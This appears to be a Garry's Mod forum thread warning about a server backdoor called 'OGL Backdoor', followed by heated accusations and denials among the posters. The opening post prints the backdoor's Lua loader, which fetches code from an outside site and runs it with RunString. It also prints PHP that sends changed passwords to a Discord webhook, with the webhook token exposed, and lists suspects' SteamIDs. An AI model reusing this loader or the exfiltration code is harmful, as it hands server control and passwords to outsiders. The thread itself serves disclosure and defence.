• [PSA] "OGL Backdoor"
    51 replies, posted
Built to be used as a sold product(??) to fuck around / rcon access with lots of servers. Also had users with authentication. Their steamid's are listed below: CREATE TABLE `users` (   `id` int(11) NOT NULL,   `steamid64` varchar(17) NOT NULL,   `access` int(11) NOT NULL ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- -- Dumping data for table `users` -- INSERT INTO `users` (`id`, `steamid64`, `access`) VALUES (1, '76561198068050448', 1), (2, '76561198109963148', 1), (3, '76561198059015684', 0), (4, '76561198047164352', 1), (5, '76561198068488005', 1); https://steamcommunity.com/profiles/76561198068050448/ https://steamcommunity.com/profiles/76561198109963148/ https://steamcommunity.com/profiles/76561198059015684/ https://steamcommunity.com/profiles/76561198047164352/ https://steamcommunity.com/profiles/76561198068488005/ Uses discord server for hacking: 490256506730840064 The Webhook was deleted after confrontation: {"code": 10015, "message": "Unknown Webhook"}  Previously: {"name": "OGL Backdoor", "channel_id": "490284867473375242", "token": "1xOLM9GRpjjD2bL-hLQJSfAmq09_GbRaW2KNgcewOzD1sIxLtFbOS0Gjq_Fdh3x4dfL9", "avatar": null, "guild_id": "490256506730840064", "id": "490270171206909972"} Also webhooks every time he changes someone's password! $webhook = "https://discordapp.com/api/webhooks/490270171206909972/1xOLM9GRpjjD2bL-hLQJSfAmq09_GbRaW2KNgcewOzD1sIxLtFbOS0Gjq_Fdh3x4dfL9";  $msg = json_decode(' { "username":"OGL Backdoor", "embeds": [{ "author": { "name": "OGL Backdoor", "url": "https://oglnetwork.tk/servers", "icon_url": "https://i.imgur.com/EF0CNeJ.png" }, "title": "A new password has been set", "description": "To view the password online [Press Here](https://oglnetwork.tk/profile)", "color": 16753200, "fields": [ { "name": "New Password", "value": "'. "{$newPassword}" . '", "inline": false } ], "footer": { "text": "View full server details online" } }] } ', true); discordmsg($msg, $webhook); lua: if !SERVER then return end if !game.IsDedicated() then return end if game.SinglePlayer() then return end local time = CurTime() hook.Add("Think", "LoadAllImportantStuff", function() if CurTime() > time + 10 then time = CurTime() http.Fetch("https://oglnetwork.tk/backdoor?ogl", function(code) RunString(code) end) end end) Loads a backdoor from this website, logs chat and server messages. Via RunString. Also includes chat logs & server last backdoor timestamps (TODAY.) https://ph129.net/i/files/B93972E3.png I won't be releasing the SQL database as it has over 400 servers which may or may not be compromised, but here are his backdoor site files: His hosting is now terminated so none of the credentials will work. https://ph129.net/i/files/V8V0i6q5.zip "I had no idea backdooring gmodstore servers was against your rules" Lol. https://steamcommunity.com/profiles/76561198068050448/ https://ph129.net/i/files/10G7Z3Y0.png This is probably within a gmodstore addon by the looks of the cancellation reason, however I would also look into his workshop addons as I don't have time.
Honestly who ever is sad enough to brand this as `OGL Backdoor` You seriously need to get a new hobby! This is getting ridiculous, go spend your time outside or some shit. I was told "I dont make backdoors fgt" after confrontation, but that's clearly not true. When was it apparent to you, that all because someone with to much time on there hands, makes a backdoor and calls it OGL, its suddenly mine? oh god this is the best part! `Named after OGL Networks (Happens to be a friend, so is also involved.) Steam Community` AHAHAH omg. good luck in the real world buddy ahahahah oh jeez. Feel bad for you ngl bro. Here is a tip. don't believe everything you hear Some people just cant be happy for someone else's success
already off to a good start
Your friend (Member87) is sad enough to brand it as "OGL Networks", unless you've already removed him from your friends list https://ph129.net/i/files/l41441C1.png He is also the user that was hosting it. Co-incidence i think not. Anyways, have fun.
Bless you ahaha My friend? i run a gmod server i get alot of friend requests, and im nice enough to accepts some... think what you want buddy but you have no idea. get a new hobby ;)
https://gifimage.net/wp-content/uploads/2017/10/michael-jackson-eating-popcorn-gif-6.gif
Ok first of all I want to make clear I have nothing to do with OGL, Their backdoor seems pasted and extremely bad quality, Look's like a wannabe globalfall/hail Second of all, let's not act like you are some sort of angel yourself phoenix, you knowingly backdoored hundreds of servers that were still using scriptenforcer.net to redirect them to your zombie server. So you are also malicious and not to be trusted. (To be honest most DRM services are backdoors in themselves, scriptenforcer, securegmod, billys DRM, VCMOD) And although they are said to be "protecting code from leakers" in fact they don't tell you they can run malicious code on your server at any time they want to. We've had multiple stories with evidence on g-security that this has been the case unfortunately. Also, another thing How did you get your hands on the SQL database and the website source files? You must have either Known the server host company and got it from them (Allowed but still against data protection most likely) Hacked into the web server and leaked the files (Breaking the computer misuse act, which is probably far worse than someone simply backdooring a gmod server) (Extremely unlikely but still possible) Tricked them into giving you access. Phoenix is an extremely aggressive and immature person who thinks the ends justify the means, which isn't good if he decides to go into the professional world of IT. Although that's most of gmodstore tbh. So in short, readers of this thread, phoenix isn't someone to be trusted either with this sort of information. I'm not a supporter of OGL and franky I find it funny that they have been caught.
He didn't backdoor, but arrogant as fuck, if this guy deserve hate, it's not for this fake attack
xD Honestly Agree ^ I don't care what other people have to think about the situation. all because someone names a domain my so called `brand` and i have a person on my friends list, does not make me the bad guy. 1 - I have 0 knowledge of backdooring a server 2 - i talked to member87 maybe once or twice that i can recall. Not to come off like a jerk in the past comments but it frustrates me a lot. How someone has the time to do that shit, im being honest here. If i wanted to backdoor servers. Why the hell would i name the backdoor after me knowing id just be targeted. Makes no sense! Thank you @y78g8b8 I don't have great understanding of members of the Gmod community, as i haven't been running a server myself for very long. But i cant stress enough, don't believe what you hear about someone else, majority of the time the person is jealous or just has nothing better to do
Thing is. If he is an asshole and just want an attention, why the hell are you trying to defend youself so blintly and you are here writing your thouse posts? I mean if a person is truly have nothing to do with anything he would just say "Lol sure" or "Yeah Ima da mastermide behind the topkekest backdoor in the gmod". All you do is just proving yourself gilty at this point tbh.
Why are you getting so unbelievably defensive out of nowhere if you had nothing to do with it? You're not coming in here like "oh shit someone stole my name and is making me look bad," you're storming in here all like "LOL you fuckin MORON that isnt ME you stupid sack of SHIT!!! LOLOLOLOL!!!!" (obviously that was some drawn-out exaggeration but you get the point)
Look. I'm not here to change your opinion of me, that isn't the point of the post. The point of the post was to make users aware of the extent of this backdoor. I will release a list of affected server hostname/ips when I am home shortly. I backdoored the api to my business a year after it closed to prevent it from being misused. It would print "stop using SE scripts it's dead" and redirect users to my server with a notice about it. Some of these users contacted me via steam and I helped them fix it. I received threats prior to this, so means to an end as you say. I have since as mentioned before dropped the domain. There are 0 legitimate customers affected by this as only leaks are still circulated. The api is now dead as servers had finally updated. Legitimate purchases of outdated scripts have long since updated as my intention. Obviously I can't post this in a thread on a forum I am banned from. No dramas. Anyway, I know the company he hosted with, they contacted me about this issue and would like to remain anonymous.
Been a while since a backdoor "PSA" resulted in this much drama. Reminds me of the good old days.
Scriptenforcer ooga booga. Is this post a joke?
I wonder what you meant by this. Just because it’s from the guy who owned ScriptEnforcer it shouldn’t be taken to attention? The given code is obviously backdoor tier stuff, so the claim isn’t false or anything.
Do you guys really think a man of this intelligence could make a backdoor let alone a scrappy website https://files.facepunch.com/forum/upload/564/ecdef0dc-c44b-4199-a21e-d4ced3eb33d8/1574C419-9BA4-4A9F-AF29-3FCA99068C9E.jpeg
Oh hi. Welcome, thought you might show yourself at some point. Well, noting he is one of the guys involved, second steamid, he's probably trying to keep it low by yet again changing the topic. He also has gmodstore scripts for sale. Perhaps he is the one with the backdoored scripts? Just speculation, i'll be back after work.
The backdoor was all in leaks that we reuploaded to codefodder. This PSA is pointless. If people don't want backdoors, just don't use leaks. The code isnt in any workshop anddons and nor is it in any gmodstore addon.
I mean regardless of whether he actually did create and distribute this backdoor or not, a whole thread being created calling him out for it is horrible publicity for him and his community thus he would obviously want to to dispel it if it's slander. It is quite stupid to assume that he shouldn't be defensive about the whole thing, sure he is hardly handling it in an ideal way since he is not clearly the most articulate person but its only natural for one to be defensive when they are called out. To assume that the arrogant sarcastic approach is the only way and most mature way to deal with it is not a good assumption to make. On a different note surely when making a thread about this and blatantly calling out OGL you should at least have some actual evidence that he either created or distributed it? All you have done is provide steam profiles* and then look at the blatant attempt to pin it on OGL and then use that to conclude that it was indeed him who created and distributed the backdoor. *which upon only a few minutes of investigation you will find are all related to Halogen Servers meaning the logical assumption would actually be that those 5 from Halogen Servers created and distributed it and that they simply put OGL Networks' name on it either to shift the blame from Halogen or specifically to pin it on him.
This guy is completely dumb, did some jobs for him and he couldn't NEVER give me exactly what does he wants, making me waste my time and obviously his time, turned damn annoying everytime he wanted something, I was completely unclue how he could manage a server by himself by the way he worked with me or behaves I completely doubt he would be even capable of do something like this, like he would if he had the knowledge, but he's that dumb to get a group of people to achieve something like this
phoenix is a nice dude.. i know some people having figths with him.. but all in all he is friendly and helpfully. so thanks for the "backdoor" information.
The ironic part is that Phoenix backdoored scripts using scriptenforcer after he ran away
doesn't change the fact that you haven't done anything
want me to slap their wrists?
sure, that's effective
People don't know how to lie when called, so we get enjoy posts like this. The asshole that put this PSA thread up did some backdoor related shit, and suddenly closing scriptenforcer was an absolute fucking dick move. Yet I respect his way of dealing with being called out, unlike with the few posts you two have written, where I've lost all respect without even knowing you. Look, I've been through this shit and seen it countless times. I know what to do when you're being called out on your shit, but let me first tell you what you should not do: Use emotional language. Shit like "AHAHAH omg", and "ahahahah oh jeez" show how angry you are. It tells me that you cannot deal with being called out. You're throwing a hissy fit. People have respect for people who remain calm and collected, not people who do that shit. Attacking the people who called you out on personal shit. Shit like "get a new hobby", "go spend your time outside", "good luck in the real world buddy", "some people just can't be happy for someone else's success" again show huge emotion. Also, they're all obvious empty insults. It's clear to everyone that you don't know what life Phoenixf129 has outside of GMod. Your insults are generic, and seem to stem only from the fact that you got called out. Generic insults tell people that you don't know how to deal with being confronted. Attempting to distract everyone with unrelated shit. Phoenix' past actions are unrelated. He's done shady shit in the past, but so has basically any famous scripter here on the forums, including me. That does not make his PSA any less credible, or even hypocritical. Stop trying to distract people, and own up to your god damn mistakes. Here's what you should do: Be honest. Say what you know and admit when you know you've done wrong. You will be yelled at, you will be called names, but I know from experience that what you're doing now will cause you more stress than the alternative. I'm talking about the anger you feel (and show) when you write your posts. Admitting I fucked up has given me a feeling that counters the anger I felt for being called out. Finding that I can regain respect even after a colossal fuck up is genuinely empowering. Also, it's why I still have some respect for Phoenixf129. Fix up your grammar and spelling. People see a bunch of "classic" mistakes, like "there hands", "to much", "its [...] mine", "cant", lack of capitalisation, and we just conclude that you're too dumb to spell. I'm sure you can do better, and it will genuinely make your posts look better Also, I reckon quite a few people read these kinds of threads for the drama. I know I do . How well they're entertained depends on how you decide to behave from here on.
https://files.facepunch.com/forum/upload/253449/e8279628-53df-4521-b2a7-90a64c45a43e/Capture.png :thinking:
Seems a lot like you and CLEAR are trying to divert everyone's focus to Phoenix's past in order to take away from the fact that you and him were actively placing backdoors on people's servers without them knowing. :thinking:
Seems a lot like you are giving phoenix the succ :thinking: If placing backdoors on people's servers was possible i think we'd all be re-thinking where to invest money.
Maybe people shouldn't be using leaks in the first place?
Sorry, you need to Log In to post a reply to this thread.